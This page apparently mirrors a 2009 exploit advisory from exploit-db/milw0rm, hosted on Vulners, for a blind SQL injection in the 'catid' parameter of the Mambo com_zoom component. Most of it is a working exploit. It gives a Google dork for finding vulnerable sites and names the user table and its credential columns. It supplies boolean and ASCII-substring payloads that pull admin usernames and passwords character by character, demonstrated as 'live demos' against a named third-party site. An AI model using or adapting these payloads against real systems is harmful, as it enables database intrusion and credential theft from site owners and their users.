Lucene search
+L

Mambo Component com_zoom - 'catid' Blind SQL Injection

🗓️ 04 Sep 2009 00:00:00Reported by boom3rangType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Mambo Component com_zoom Blind SQL Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4474
4 Sep 200900:00
circl
cve
CVE
CVE-2009-4474
30 Dec 200921:00
cve
cvelist
Cvelist
CVE-2009-4474
30 Dec 200921:00
cvelist
euvd
EUVD
EUVD-2009-4441
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4474
30 Dec 200921:30
nvd
prion
Prion
Sql injection
30 Dec 200921:30
prion
  Mambo component com_zoom (catid) Blind SQL injection                                       [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/


      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ###################################################################

       Author         	: boom3rang
       Contact        	: boom3rang[at]live.com
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de
   -------------------------------------------------------------------

                  Affected software description
             <name>zoom</name>
             <creationDate>20/01/2004</creationDate>
             <author>Mike de Boer</author>
             <authorEmail>[email protected]</authorEmail>
             <authorUrl>www.mikedeboer.nl</authorUrl>
             <version>2.0</version>
   -------------------------------------------------------------------

    [~] SQLi :

    http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]

    [~]Google Dork :

    inurl:com_zoom inurl:"imgid"

   -------------------------------------------------------------------

    [~] Table_NAME  =  mos_users
    [~] Column_NAME =  username - password
   -------------------------------------------------------------------

    [~] Admin Path :

    http://www.TARGET.com/administrator

   ===================================================================
	                          = POC =
   ===================================================================


    [~] Live Demo:
    ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/*    --> True
   ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/*    --> False

   -------------------------------------------------------------------

    [~] ASCII
   index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

   -------------------------------------------------------------------

    [~] Live Demo ASCII

      True
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

      False
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

   Like we see, the first charter of username is 'a'	char(97)=a
   Now you can change the second limit to find other charters, Good Luck...

note:
<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>

# milw0rm.com [2009-09-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0095
38